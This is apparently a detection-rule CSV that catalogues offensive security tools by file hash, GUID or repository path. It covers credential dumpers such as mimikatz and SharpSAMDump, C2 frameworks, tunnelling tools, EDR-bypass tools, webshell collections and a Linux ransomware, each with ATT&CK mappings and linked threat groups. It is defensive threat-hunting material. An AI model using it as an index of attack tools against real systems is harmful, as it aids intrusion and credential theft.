"*4f1fcdf5b4c104fb6585cd73272adc8e31a279dffd5cae84e5e83c685f4830bd*",".{0,1000}4f1fcdf5b4c104fb6585cd73272adc8e31a279dffd5cae84e5e83c685f4830bd.{0,1000}","offensive_tool_keyword","impacket","Impacket is a collection of Python classes for working with network protocols. Impacket is focused on providing low-level programmatic access to the packets and for some protocols (e.g. SMB1-3 and MSRPC) the protocol implementation itself","T1557.001 - T1040 - T1003.001 - T1003.002 - T1003.003 - T1003.004 - T1558.003 - T1569.002 - T1047","TA0001 - TA0003 - TA0004 - TA0005 - TA0006 - TA0008 - TA0011","N/A","Akira - Bassterlord* - BianLian - Dragonfly - FIN8 - HAFNIUM - Hive - LockBit - Magic Hound - RansomHub - Rhysida - Sandworm Team - Scattered Spider* - Threat Group-3390 - Yanluowang - menuPass - Volt Typhoon - Cinnamon Tempest - Magic Hound - DAGGER PANDA - ENERGETIC BEAR - DEV-0270 - COZY BEAR - FANCY BEAR  - EMBER BEAR - BERSERK BEAR - Dispossessor - Black Basta","Lateral Movement","https://github.com/fortra/impacket","1","0","#filehash","N/A","10","10","14198","3681","2025-04-22T13:40:55Z","2015-04-15T14:04:07Z","26407"
"*4f1ffecb374f22e4e622bc96869d412bc9e61c8fb14688336e65585fe392b20e*",".{0,1000}4f1ffecb374f22e4e622bc96869d412bc9e61c8fb14688336e65585fe392b20e.{0,1000}","offensive_tool_keyword","Amass","The OWASP Amass Project performs network mapping of attack surfaces and external asset discovery using open source information gathering and active reconnaissance techniques.","T1595 - T1596 - T1018 - T1482","TA0007 - TA0043  - ","N/A","EMBER BEAR","Reconnaissance","https://github.com/caffix/amass","1","0","#filehash #linux","N/A","5","","N/A","","","","26408"
"*4f2678fa0f90074ae304f8fdb9174d0c577f1a0587af44a4e8e756a547e5c2e4*",".{0,1000}4f2678fa0f90074ae304f8fdb9174d0c577f1a0587af44a4e8e756a547e5c2e4.{0,1000}","offensive_tool_keyword","recaptcha-phish","Phishing with a fake reCAPTCHA","T1566.001 - T1204.002 - T1071.003","TA0001 - TA0002","Lumma Stealer","N/A","Phishing","https://github.com/JohnHammond/recaptcha-phish","1","0","#filehash","N/A","10","6","534","104","2024-09-13T11:18:29Z","2024-09-13T07:00:40Z","26411"
"*4f28ea38405ad0908c509ed774da63b57606fc2257e76d613e6968ff390867a9*",".{0,1000}4f28ea38405ad0908c509ed774da63b57606fc2257e76d613e6968ff390867a9.{0,1000}","offensive_tool_keyword","brutespray","BruteSpray takes nmap GNMAP/XML output or newline seperated JSONS and automatically brute-forces services with default credentials using Medusa. BruteSpray can even find non-standard ports by using the -sV inside Nmap.","T1110","TA0001 - TA0043","N/A","N/A","Credential Access","https://github.com/x90skysn3k/brutespray","1","0","#filehash","N/A","10","10","2231","405","2025-04-21T03:17:20Z","2017-04-05T17:05:10Z","26412"
"*4f2a713d98aedd080e4cda63a75f4057997d1aa87903649a921cadeed54463aa*",".{0,1000}4f2a713d98aedd080e4cda63a75f4057997d1aa87903649a921cadeed54463aa.{0,1000}","offensive_tool_keyword","jackdaw","Jackdaw is here to collect all information in your domain. store it in a SQL database and show you nice graphs on how your domain objects interact with each-other an how a potential attacker may exploit these interactions. It also comes with a handy feature to help you in a password-cracking project by storing/looking up/reporting hashes/passowrds/users.","T1087 - T1482 - T1201 - T1213 - T1003","TA0007 - TA0008 - TA0009 - TA0006","N/A","N/A","Reconnaissance","https://github.com/skelsec/jackdaw","1","0","#filehash","N/A","5","6","576","89","2025-03-15T13:37:50Z","2019-03-27T18:36:41Z","26414"
"*4F2AD0E0-8C4D-45CB-97DE-CE8D4177E7BF*",".{0,1000}4F2AD0E0\-8C4D\-45CB\-97DE\-CE8D4177E7BF.{0,1000}","offensive_tool_keyword","ContainYourself","Abuses the Windows containers framework to bypass EDRs.","T1562 - T1562.004 - T1212 - T1212.002 - T1055 - T1055.015","TA0005","N/A","N/A","Defense Evasion","https://github.com/deepinstinct/ContainYourself","1","0","#GUIDproject","N/A","10","4","310","39","2023-08-31T07:26:22Z","2023-07-12T14:47:24Z","26415"
"*4f3632bb0c4eb05c443535dd3a773f83b3ac47f20ba75fbc3a2c8e6b80a46c60*",".{0,1000}4f3632bb0c4eb05c443535dd3a773f83b3ac47f20ba75fbc3a2c8e6b80a46c60.{0,1000}","offensive_tool_keyword","DriverDump","abusing the old process explorer driver to grab a privledged handle to lsass and then dump it","T1543 - T1548 - T1562 - T1003 - T1569","TA0005 - TA0003 - TA0004 - TA0006 - TA0009","N/A","N/A","Credential Access","https://github.com/trustedsec/The_Shelf","1","0","#filehash","N/A","10","3","247","14","2024-11-25T19:33:34Z","2024-05-22T14:31:52Z","26417"
"*4f3784494848580ecfbb02690d5a22d0501a4bdc3c63fe0fdbdb81b93ae09e37*",".{0,1000}4f3784494848580ecfbb02690d5a22d0501a4bdc3c63fe0fdbdb81b93ae09e37.{0,1000}","offensive_tool_keyword","Lime-RAT","remote administration tool for Windows (RAT)","T1059 - T1573.001 - T1027 - T1091 - T1486 - T1036 - T1560 - T1566 - T1480 - T1498 - T1113 - T1083 - T1016 - T1105 - T1056 - T1021 - T1112 - T1082 - T1072 - T1076 - T1078 - T1209 - T1003 - T1012 - T1100 - T1135 - T1108 - T1029 - T1547 - T1053 - T1060 - T1102 - T1124 - T1049 - T1123 - T1145 - T1210 - T1046 - T1010 - T1055","TA0040 - TA0010 - TA0005 - TA0011 - TA0043 - TA0006 - TA0042 - TA0008 - TA0009 - TA0007 - TA0002 - TA0003","N/A","APT-C-36 - Operation Comando","Malware","https://github.com/NYAN-x-CAT/Lime-RAT","1","0","#filehash","N/A","10","10","1086","413","2019-06-24T17:05:48Z","2018-02-07T15:35:56Z","26418"
"*4f38ded60a6580dba88d19fb2a49dc8391a49b90133b1daf25a384d5d94111be*",".{0,1000}4f38ded60a6580dba88d19fb2a49dc8391a49b90133b1daf25a384d5d94111be.{0,1000}","offensive_tool_keyword","tun2socks","socks tunneling","T1572 - T1090 - T1071 - T1573 - T1205","TA0010 - TA0011 - TA0008 - TA0005","N/A","N/A","C2","https://github.com/xjasonlyu/tun2socks","1","0","#filehash","N/A","10","10","3785","513","2025-04-15T21:19:25Z","2019-07-16T03:25:40Z","26419"
"*4f46ef9f5543cd4ca10f4908886e78dccf77b66e5ede7de8e6ec59148309b88b*",".{0,1000}4f46ef9f5543cd4ca10f4908886e78dccf77b66e5ede7de8e6ec59148309b88b.{0,1000}","offensive_tool_keyword","taowu-cobalt-strike","Collection of hacktools binaries","T1003 - T1059 - T1087 - T1110 - T1135 - T1047 - T1078 - T1086 - T1098 - T1212 - T1021 - T1056 - T1071 - T1210 - T1484 - T1555 - T1055 - T1005 - T1090 - T1080 - T1204 - T1496 - T1114 - T1562 - T1482 - T1505 - T1548 - T1560 - T1566 - T1218 - T1547 - T1070 - T1206 - T1208","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0010 - TA0011","N/A","N/A","Exploitation tool","https://github.com/pandasec888/taowu-cobalt_strike/tree/312fec79b3413ecfc06bc43efccfcbc1383a3566","1","0","#filehash","N/A","10","10","1797","330","2023-10-31T09:13:10Z","2020-07-05T10:13:00Z","26425"
"*4f52fb4cf7dd744b01695e5356442182bc9fdb635da8f766537c12e0d83ad18f*",".{0,1000}4f52fb4cf7dd744b01695e5356442182bc9fdb635da8f766537c12e0d83ad18f.{0,1000}","offensive_tool_keyword","CDK","CDK is an open-sourced container penetration toolkit","T1610 - T1611 - T1203 - T1059.004 - T1564.004","TA0001 - TA0002 - TA0003 - TA0004 - TA0005","N/A","N/A","Persistence","https://github.com/cdk-team/CDK","1","0","#linux #filehash","N/A","9","10","4164","566","2025-03-08T14:00:06Z","2020-11-05T09:18:51Z","26427"
"*4f5f8bd4df664f10dbd919129bbf7d8c6c8a02da74b36a20c322b5a1ce257249*",".{0,1000}4f5f8bd4df664f10dbd919129bbf7d8c6c8a02da74b36a20c322b5a1ce257249.{0,1000}","offensive_tool_keyword","FruityC2","ruityC2 is a post-exploitation framework based on the deployment of agents on compromised machines","T1090 - T1572 - T1071.001","TA0010 - TA0011 - TA0008 - TA0005","N/A","MuddyWater","C2","https://github.com/xtr4nge/FruityC2","1","0","#filehash","https://documents.trendmicro.com/assets/white_papers/wp_new_muddywater_findings_uncovered.pdf","10","10","208","67","2017-12-04T17:05:23Z","2017-01-11T17:27:45Z","26429"
"*4f60610a88f4afa9393e2bbd7c20f65b59bfee7d7ca8576b25131b7bae7f30db*",".{0,1000}4f60610a88f4afa9393e2bbd7c20f65b59bfee7d7ca8576b25131b7bae7f30db.{0,1000}","offensive_tool_keyword","NetExec","NetExec (a.k.a nxc) is a post-exploitation tool that helps automate assessing the security of large Active Directory networks.","T1110 - T1135 - T1047 - T1078 - T1087 - T1021","TA0006 - TA0007 - TA0003 - TA0008 - TA0005","N/A","N/A","Exploitation tool","https://github.com/Pennyw0rth/NetExec","1","0","#filehash","N/A","10","10","4066","459","2025-04-20T00:08:29Z","2023-09-08T15:36:00Z","26430"
"*4f64f71a7d6b8be79754e7bf2109675ffc8a3e37a4a55b08c95a1b1d25e458e5*",".{0,1000}4f64f71a7d6b8be79754e7bf2109675ffc8a3e37a4a55b08c95a1b1d25e458e5.{0,1000}","offensive_tool_keyword","gsocket","The Global Socket Tookit allows two users behind NAT/Firewall to establish a TCP connection with each other. Securely.","T1572","TA0011 - TA0003","N/A","N/A","C2","https://github.com/hackerschoice/gsocket","1","0","#filehash","N/A","10","10","1671","142","2025-04-22T14:47:29Z","2020-09-18T16:14:22Z","26431"
"*4f715f37eddadb3d8f5680f7075e695e99496b91473f17d4507568518dd4284d*",".{0,1000}4f715f37eddadb3d8f5680f7075e695e99496b91473f17d4507568518dd4284d.{0,1000}","offensive_tool_keyword","SpoolFool","Exploit for CVE-2022-21999 - Windows Print Spooler Elevation of Privilege Vulnerability (LPE)","T1068 - T1055 - T1059.003","TA0004 - TA0005 - TA0003","","Dispossessor","Privilege Escalation","https://github.com/ly4k/SpoolFool","1","0","#filehash","N/A","9","8","788","160","2022-02-09T16:54:09Z","2022-02-08T17:25:44Z","26435"
"*4f7931570b3ec42b04ef2607e39aec95ad4c863039417eff45978f58bec99c95*",".{0,1000}4f7931570b3ec42b04ef2607e39aec95ad4c863039417eff45978f58bec99c95.{0,1000}","offensive_tool_keyword","Amass","The OWASP Amass Project performs network mapping of attack surfaces and external asset discovery using open source information gathering and active reconnaissance techniques.","T1595 - T1596 - T1018 - T1482","TA0007 - TA0043  - ","N/A","EMBER BEAR","Reconnaissance","https://github.com/caffix/amass","1","0","#filehash #linux","N/A","5","","N/A","","","","26437"
"*4f79abecd004edb56882c1437e180acf8352adf3edeff72546a441f02db30b09*",".{0,1000}4f79abecd004edb56882c1437e180acf8352adf3edeff72546a441f02db30b09.{0,1000}","offensive_tool_keyword","tun2socks","socks tunneling","T1572 - T1090 - T1071 - T1573 - T1205","TA0010 - TA0011 - TA0008 - TA0005","N/A","N/A","C2","https://github.com/xjasonlyu/tun2socks","1","0","#filehash","N/A","10","10","3785","513","2025-04-15T21:19:25Z","2019-07-16T03:25:40Z","26438"
"*4f83c68530797e82a76434950e56e3512487a340b5b4e24cd9f81be4eb9e9408*",".{0,1000}4f83c68530797e82a76434950e56e3512487a340b5b4e24cd9f81be4eb9e9408.{0,1000}","offensive_tool_keyword","sharpcollection","Nightly builds of common C# offensive tools. fresh from their respective master branches built and released in a CDI fashion using Azure DevOps release pipelines.","T1059 - T1027 - T1036 - T1562 - T1045 - T1024 - T1070 - T1574 - T1071 - T1078 - T1003 - T1072 - T1075 - T1077 - T1079 - T1083 - T1105 - T1106 - T1120 - T1135 - T1158 - T1204 - T1214 - T1215 - T1220 - T1221 - T1222 - T1223 - T1224 - T1227 - T1247 - T12","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0010 - TA0011","N/A","Black Basta","Exploitation tool","https://github.com/Flangvik/SharpCollection","1","0","#filehash","N/A","10","10","2452","358","2025-04-18T03:38:55Z","2020-06-05T12:50:00Z","26439"
"*4f911b0fae752353f1f78cd403a38ed44a6de2e32cfdec6b12ed5fed44a6bea1*",".{0,1000}4f911b0fae752353f1f78cd403a38ed44a6de2e32cfdec6b12ed5fed44a6bea1.{0,1000}","offensive_tool_keyword","specula","Specula is a C2 framework that allows for interactive operations of an implant that runs purely in the context of outlook","T1071.001 - T1105 - T1204 - T1548.002 - T1071 - T1562","TA0011 - TA0002 - TA0003 - TA0006 - TA0008 - TA0007 - TA0009 - TA0010","N/A","N/A","C2","https://github.com/trustedsec/specula","1","0","#filehash","N/A","10","10","191","21","2024-09-23T09:25:33Z","2023-12-07T15:59:52Z","26443"
"*4f9185140867a6bb07dc99ff4f41d8e3e66e60b27161b613887ed8b38f956fb1*",".{0,1000}4f9185140867a6bb07dc99ff4f41d8e3e66e60b27161b613887ed8b38f956fb1.{0,1000}","offensive_tool_keyword","tun2socks","socks tunneling","T1572 - T1090 - T1071 - T1573 - T1205","TA0010 - TA0011 - TA0008 - TA0005","N/A","N/A","C2","https://github.com/xjasonlyu/tun2socks","1","0","#filehash","N/A","10","10","3785","513","2025-04-15T21:19:25Z","2019-07-16T03:25:40Z","26444"
"*4f92da7a73e1e1fbe833d6208e7e7b9ca8b62fc5865453e8bedf5ba3ffff2531*",".{0,1000}4f92da7a73e1e1fbe833d6208e7e7b9ca8b62fc5865453e8bedf5ba3ffff2531.{0,1000}","offensive_tool_keyword","ligolo-ng","An advanced tunneling tool that uses TUN interfaces","T1572 - T1090","TA0011","N/A","Dispossessor - AvosLocker - LockBit","C2","https://github.com/nicocha30/ligolo-ng","1","0","#filehash","N/A","10","10","3380","338","2025-04-17T07:48:36Z","2021-07-28T12:55:36Z","26446"
"*4fa359eb9b1b66b9421ecebb27056254ec62d0b31a68a72284dd498380dc4177*",".{0,1000}4fa359eb9b1b66b9421ecebb27056254ec62d0b31a68a72284dd498380dc4177.{0,1000}","offensive_tool_keyword","webshell","collection of webshell - observed used by famous webshells","T1100 - T1027 - T1059 - T1105","TA0003 - TA0005 - TA0011 - TA0002","N/A","N/A","C2","https://github.com/tennc/webshell","1","0","#filehash","N/A","9","10","10344","5595","2024-12-24T15:37:05Z","2013-05-23T07:37:56Z","26448"
"*4fa537aa8c3949d9fa489c05e50c781a69620db8ead08cbe0538eb9e7d8c1016*",".{0,1000}4fa537aa8c3949d9fa489c05e50c781a69620db8ead08cbe0538eb9e7d8c1016.{0,1000}","offensive_tool_keyword","windows-defender-remover","hacktool used to remove Windows Defender","T1089 - T1562.001 - T1562.004","TA0005 - TA0040","N/A","Black Basta","Defense Evasion","https://github.com/ionuttbara/windows-defender-remover","1","0","#filehash","N/A","10","10","5266","354","2025-02-13T20:21:07Z","2021-08-13T20:44:46Z","26449"
"*4fa756694752065bbcaf8bda18a23b6e25936e301dad50bde68ea4900592aeae*",".{0,1000}4fa756694752065bbcaf8bda18a23b6e25936e301dad50bde68ea4900592aeae.{0,1000}","offensive_tool_keyword","Argus","Information Gathering Toolkit","T1590.001 - T1590.002 - T1595.003 - T1016 - T1046 - T1590.005","TA0043 - TA0007","N/A","N/A","Reconnaissance","https://github.com/jasonxtn/Argus","1","0","#filehash","N/A","4","10","1951","210","2024-10-08T19:04:27Z","2024-10-01T22:13:51Z","26450"
"*4FB03AD0-96FF-4730-801A-4F997795D920*",".{0,1000}4FB03AD0\-96FF\-4730\-801A\-4F997795D920.{0,1000}","offensive_tool_keyword","ConfuserEx","ConfuserEx is a widely used open source obfuscator often found in malware","T1027 - T1045","TA0005 ","N/A","N/A","Defense Evasion","https://github.com/yck1509/ConfuserEx","1","0","#GUIDproject","N/A","6","10","3629","1661","2019-05-14T14:23:56Z","2014-03-28T07:00:26Z","26452"
"*4fbeeeeda8c0b7858a26a16fc65709b3a3c08d309032602574f4f7438964612f*",".{0,1000}4fbeeeeda8c0b7858a26a16fc65709b3a3c08d309032602574f4f7438964612f.{0,1000}","offensive_tool_keyword","GonnaCry","a linux ransomware","T1486 - T1059 - T1020 - T1083 - T1070","TA0040 - TA0005 - TA0009 - TA0010","N/A","N/A","Ransomware","https://github.com/tarcisio-marinho/GonnaCry","1","0","#filehash #linux","N/A","10","8","717","402","2025-01-24T13:39:57Z","2017-05-12T23:46:28Z","26454"
"*4fcf193202e55eff267792c86cea4098711b24d3fa0cca8e03027da2ddb3206a*",".{0,1000}4fcf193202e55eff267792c86cea4098711b24d3fa0cca8e03027da2ddb3206a.{0,1000}","offensive_tool_keyword","kiglogger","malware parental control software - keylogger","T1056.001 - T1113 - T1056.004","TA0006 - TA0009","N/A","N/A","Collection","https://kidlogger.net/download.html","1","0","#filehash","N/A","10","10","N/A","N/A","N/A","N/A","26455"
"*4FEAB888-F514-4F2E-A4F7-5989A86A69DE*",".{0,1000}4FEAB888\-F514\-4F2E\-A4F7\-5989A86A69DE.{0,1000}","offensive_tool_keyword","SharpSAMDump","SAM dumping via the registry in C#/.NET","T1003.002 - T1552.002","TA0006","N/A","N/A","Credential Access","https://github.com/jojonas/SharpSAMDump","1","0","#GUIDproject","N/A","10","1","48","8","2025-01-16T07:08:58Z","2024-05-27T10:53:27Z","26460"
"*4ff3269f19b3cabf56ed566d1f43636587c6fd61facb013e69244babf3c9c2a8*",".{0,1000}4ff3269f19b3cabf56ed566d1f43636587c6fd61facb013e69244babf3c9c2a8.{0,1000}","offensive_tool_keyword","ligolo-ng","An advanced tunneling tool that uses TUN interfaces","T1572 - T1090","TA0011","N/A","Dispossessor - AvosLocker - LockBit","C2","https://github.com/nicocha30/ligolo-ng","1","0","#filehash","N/A","10","10","3380","338","2025-04-17T07:48:36Z","2021-07-28T12:55:36Z","26462"
"*4ff61cccbdf23cddf5699b2499468ed368967fc90f0eee241679c07c561ad2d8*",".{0,1000}4ff61cccbdf23cddf5699b2499468ed368967fc90f0eee241679c07c561ad2d8.{0,1000}","offensive_tool_keyword","chisel","A fast TCP/UDP tunnel over HTTP","T1090 - T1090.003 - T1572 - T1572.001","TA0042 - TA0011","N/A","BlackSuit - Royal - AvosLocker - Cactus - Yanluowang - Sandworm - KNOTWEED","C2","https://github.com/jpillora/chisel","1","0","#filehash #linux #windows","N/A","10","10","14432","1466","2024-09-28T23:35:13Z","2015-02-25T11:42:50Z","26463"
"*4ff7578df7293e50c9bdd48657a6ba0c60e1f6d06a2dd334f605af34fe6f75a5*",".{0,1000}4ff7578df7293e50c9bdd48657a6ba0c60e1f6d06a2dd334f605af34fe6f75a5.{0,1000}","offensive_tool_keyword","mimikatz","mimikatz archives hashes","T1134.005 - T1098 - T1547.005 - T1555 - T1555.003 - T1555.004 - T1003.001 - T1003.002 - T1003.004 - T1003.006 - T1207 - T1649 - T1558.001 - T1558.002 - T1552.004 - T1550.002 - T1550.003","TA0004 - TA0006 - TA0003 - TA0008 - TA0009","N/A","Black Basta - APT1 - APT24 - APT28 - APT29 - APT32 - APT33 - APT38 - APT39 - APT41 - APT5 - Akira - Avivore  - BERSERK BEAR - BOSS SPIDER - BRONZE BUTLER - BackdoorDiplomacy - Blue Mockingbird - CHRYSENE - COZY BEAR - Carbanak - Chamelgang - Chimera - Cleaver - Cobalt Group - DarkHydrus - Dragonfly - Earth Lusca - FANCY BEAR - FIN13 - FIN6 - FIN7 - GALLIUM - Gamaredon - HEXANE - Indrik Spider - Ke3chang - Kimsuky - LAPSUS$ - Leafminer - Magic Hound - MuddyWater - OilRig - PittyTiger - Sandworm Team - Scattered Spider - TA505 - TEMP.Veles - Threat Group-3390 - Thrip - Tonto Team - Turla - Unit 29155 - Volt Typhoon - Whitefly - Wizard Spider - menuPass - Dispossessor - DragonForce - Sphinx","Credential Access","https://github.com/gentilkiwi/mimikatz","1","0","#filehash","N/A","10","10","20094","3854","2024-07-05T17:42:58Z","2014-04-06T18:30:02Z","26464"
"*4ff7578df7293e50c9bdd48657a6ba0c60e1f6d06a2dd334f605af34fe6f75a5*",".{0,1000}4ff7578df7293e50c9bdd48657a6ba0c60e1f6d06a2dd334f605af34fe6f75a5.{0,1000}","offensive_tool_keyword","mimikatz","mimikatz archives hashes","T1134.005 - T1098 - T1547.005 - T1555 - T1555.003 - T1555.004 - T1003.001 - T1003.002 - T1003.004 - T1003.006 - T1207 - T1649 - T1558.001 - T1558.002 - T1552.004 - T1550.002 - T1550.003","TA0004 - TA0006 - TA0003 - TA0008 - TA0009","N/A","Black Basta - APT1 - APT24 - APT28 - APT29 - APT32 - APT33 - APT38 - APT39 - APT41 - APT5 - Akira - Avivore  - BERSERK BEAR - BOSS SPIDER - BRONZE BUTLER - BackdoorDiplomacy - Blue Mockingbird - CHRYSENE - COZY BEAR - Carbanak - Chamelgang - Chimera - Cleaver - Cobalt Group - DarkHydrus - Dragonfly - Earth Lusca - FANCY BEAR - FIN13 - FIN6 - FIN7 - GALLIUM - Gamaredon - HEXANE - Indrik Spider - Ke3chang - Kimsuky - LAPSUS$ - Leafminer - Magic Hound - MuddyWater - OilRig - PittyTiger - Sandworm Team - Scattered Spider - TA505 - TEMP.Veles - Threat Group-3390 - Thrip - Tonto Team - Turla - Unit 29155 - Volt Typhoon - Whitefly - Wizard Spider - menuPass - Dispossessor - DragonForce - Sphinx","Credential Access","https://github.com/gentilkiwi/mimikatz","1","0","#filehash","N/A","10","10","20094","3854","2024-07-05T17:42:58Z","2014-04-06T18:30:02Z","26465"
"*4ffaf4c7ad9c606cdbce082d3b428e7666ef0ea73dcb36816a9ecfdb12d0ec34*",".{0,1000}4ffaf4c7ad9c606cdbce082d3b428e7666ef0ea73dcb36816a9ecfdb12d0ec34.{0,1000}","offensive_tool_keyword","BloodHound","Use Invoke-BloodHound from SharpHound.ps1 or use SharpHound.exe. Both can be run reflectively. Examples below use the PowerShell variant but arguments are identical.","T1482 - T1087 - T1069 - T1018","TA0007 - TA0008 - TA0004","N/A","APT29 - MAZE - LockBit - Conti - XingLocker - Revil - Hive - Black Basta - Wizard Spider - TA2101 - TRAVELING SPIDER - Chimera - TA505 - APT20 - COZY BEAR - EMBER BEAR - Dispossessor","Discovery","https://github.com/BloodHoundAD/BloodHound/tree/master/Collectors","1","0","#filehash","N/A","10","10","10146","1759","2025-04-02T15:56:30Z","2016-04-17T18:36:14Z","26466"
"*4ffe43c71089a936b582e4840c196698a269e62e43a7a48ba3c53124809ab585*",".{0,1000}4ffe43c71089a936b582e4840c196698a269e62e43a7a48ba3c53124809ab585.{0,1000}","offensive_tool_keyword","ScriptBlock-Smuggling","SCRIPTBLOCK SMUGGLING: SPOOFING POWERSHELL SECURITY LOGS AND BYPASSING AMSI WITHOUT REFLECTION OR PATCHING","T1059.001 - T1562.001 - T1112 - T1202 - T1070","TA0005","N/A","N/A","Defense Evasion","https://github.com/BC-SECURITY/ScriptBlock-Smuggling","1","0","#filehash","N/A","8","1","89","13","2024-06-18T08:35:50Z","2024-06-12T21:44:47Z","26467"
"*4g3nt47/Striker*",".{0,1000}4g3nt47\/Striker.{0,1000}","offensive_tool_keyword","Striker","Striker is a simple Command and Control (C2) program.","T1071 - T1071.001 - T1071.004 - T1071.005 - T1071.006 - T1071.007 - T1071.008 - T1071.009 - T1071.010 - T1071.012 - T1071.013 - T1071.014 - T1071.015 - T1071.016 - T1071.018 - T1105 - T1105.002 - T1573 - T1573.002 - T1573.003 - T1573.004 - T1573.005","TA0002 - TA0003 - TA0004","N/A","N/A","C2","https://github.com/4g3nt47/Striker","1","1","N/A","N/A","10","10","301","42","2023-05-04T18:00:05Z","2022-09-07T10:09:41Z","26468"
"*50008e82cf48a421aeda45c87b598339dfb18f7b336cdf9e4e2fb8677b377ea0*",".{0,1000}50008e82cf48a421aeda45c87b598339dfb18f7b336cdf9e4e2fb8677b377ea0.{0,1000}","offensive_tool_keyword","Argus","Information Gathering Toolkit","T1590.001 - T1590.002 - T1595.003 - T1016 - T1046 - T1590.005","TA0043 - TA0007","N/A","N/A","Reconnaissance","https://github.com/jasonxtn/Argus","1","0","#filehash","N/A","4","10","1951","210","2024-10-08T19:04:27Z","2024-10-01T22:13:51Z","26470"
"*5001938c441ea194bc012da03351a938611309b74c0cf5481dd2de30cb917ae1*",".{0,1000}5001938c441ea194bc012da03351a938611309b74c0cf5481dd2de30cb917ae1.{0,1000}","offensive_tool_keyword","C3","Framework designed for red teams to create and manage custom C2 (Command and Control) channels. Unlike traditional C2 frameworks that rely on typical communication methods like HTTP/S DNS or TCP -  C3 allows for the creation of non-traditional and esoteric C2 channels using platforms like Slack Dropbox GitHub OneDrive and more.","T1071 - T1102 - T1090 - T1573 - T1048","TA0011 - TA0002 - TA0005 - TA0010","N/A","N/A","C2","https://github.com/WithSecureLabs/C3","1","0","#filehash","N/A","9","10","1602","276","2023-03-04T20:32:13Z","2019-08-30T11:21:04Z","26471"
"*50050/SharpC2*",".{0,1000}50050\/SharpC2.{0,1000}","offensive_tool_keyword","SharpC2","Command and Control Framework written in C#","T1071 - T1024 - T1105  -  T1090 - T1091 - T1021 - T1573","TA0001 - TA0011 - TA0002","N/A","N/A","C2","https://github.com/rasta-mouse/SharpC2","1","1","N/A","N/A","10","10","399","57","2023-07-27T12:25:54Z","2022-10-26T12:18:07Z","26472"
"*50084b701b0463d1698211f2d0427c3eb6322be963c46cf9a4eb39e01a94cddc*",".{0,1000}50084b701b0463d1698211f2d0427c3eb6322be963c46cf9a4eb39e01a94cddc.{0,1000}","offensive_tool_keyword","Orc","Orc is a post-exploitation framework for Linux written in Bash","T1059.004 - T1036.005 - T1070.002 - T1012 - T1082 - T1003 - T1555.003 - T1049 - T1134.001 - T1202","TA0005 - TA0003 - TA0002 - TA0006 - TA0011","N/A","N/A","Exploitation tool","https://github.com/zMarch/Orc","1","0","#linux #filehash","N/A","9","4","395","53","2019-11-12T18:21:27Z","2018-08-16T11:31:39Z","26473"
"*500fd5f1772e01b5f7832f48e36e698204db2b8944bbe5162b77a70c2c59c044*",".{0,1000}500fd5f1772e01b5f7832f48e36e698204db2b8944bbe5162b77a70c2c59c044.{0,1000}","offensive_tool_keyword","tun2socks","socks tunneling","T1572 - T1090 - T1071 - T1573 - T1205","TA0010 - TA0011 - TA0008 - TA0005","N/A","N/A","C2","https://github.com/xjasonlyu/tun2socks","1","0","#filehash","N/A","10","10","3785","513","2025-04-15T21:19:25Z","2019-07-16T03:25:40Z","26475"
"*5010BEE8-0944-4655-987F-AB3BB376E774*",".{0,1000}5010BEE8\-0944\-4655\-987F\-AB3BB376E774.{0,1000}","offensive_tool_keyword","HardHatC2","A C# Command & Control framework","T1105 - T1573 - T1071 - T1027","TA0011 - TA0005 - TA0010","N/A","N/A","C2","https://github.com/DragoQCC/HardHatC2","1","0","#GUIDproject","N/A","10","10","996","130","2024-03-28T02:30:02Z","2022-12-08T19:40:47Z","26476"
"*5013e8763027aeb90e09aa70c4d29f548facb761f6c6ba6a43fe4d9ca9d58a71*",".{0,1000}5013e8763027aeb90e09aa70c4d29f548facb761f6c6ba6a43fe4d9ca9d58a71.{0,1000}","offensive_tool_keyword","Slackor","A Golang implant that uses Slack as a command and control server","T1059.003 - T1071.004 - T1562.001","TA0002 - TA0010 - TA0011","N/A","N/A","C2","https://github.com/Coalfire-Research/Slackor","1","0","#filehash","N/A","10","10","463","108","2023-02-25T03:35:15Z","2019-06-18T16:01:37Z","26477"
"*501d518404e4d32996557998d3941a72b8a09e405f07b9a2b3f320a60a7ea711*",".{0,1000}501d518404e4d32996557998d3941a72b8a09e405f07b9a2b3f320a60a7ea711.{0,1000}","offensive_tool_keyword","BloodHound","Use Invoke-BloodHound from SharpHound.ps1 or use SharpHound.exe. Both can be run reflectively. Examples below use the PowerShell variant but arguments are identical.","T1482 - T1087 - T1069 - T1018","TA0007 - TA0008 - TA0004","N/A","APT29 - MAZE - LockBit - Conti - XingLocker - Revil - Hive - Black Basta - Wizard Spider - TA2101 - TRAVELING SPIDER - Chimera - TA505 - APT20 - COZY BEAR - EMBER BEAR - Dispossessor","Discovery","https://github.com/BloodHoundAD/BloodHound/tree/master/Collectors","1","0","#filehash","N/A","10","10","10146","1759","2025-04-02T15:56:30Z","2016-04-17T18:36:14Z","26479"
"*5027474f59bb0dd2c2fcee52a0b689bd3d17068dce81fbbceffa1f52fb732223*",".{0,1000}5027474f59bb0dd2c2fcee52a0b689bd3d17068dce81fbbceffa1f52fb732223.{0,1000}","offensive_tool_keyword","hak5 cloudc2","Cloud C2 makes it easy for pentesters and security teams to deploy and manage Hak5 gear from the cloud","T1021 - T1102 - T1213","TA0002 - TA0003 - TA0006 - TA0010 - TA0011","N/A","N/A","C2","https://shop.hak5.org/products/c2?","1","0","#filehash","N/A","10","9","N/A","N/A","N/A","N/A","26480"
"*5030143146822b7274ae44cab7267ee914c71216ac54e51516b0ee16f0d394bf*",".{0,1000}5030143146822b7274ae44cab7267ee914c71216ac54e51516b0ee16f0d394bf.{0,1000}","offensive_tool_keyword","webshell","collection of webshell - observed used by famous webshells","T1100 - T1027 - T1059 - T1105","TA0003 - TA0005 - TA0011 - TA0002","N/A","N/A","C2","https://github.com/tennc/webshell","1","0","#filehash","N/A","9","10","10344","5595","2024-12-24T15:37:05Z","2013-05-23T07:37:56Z","26481"
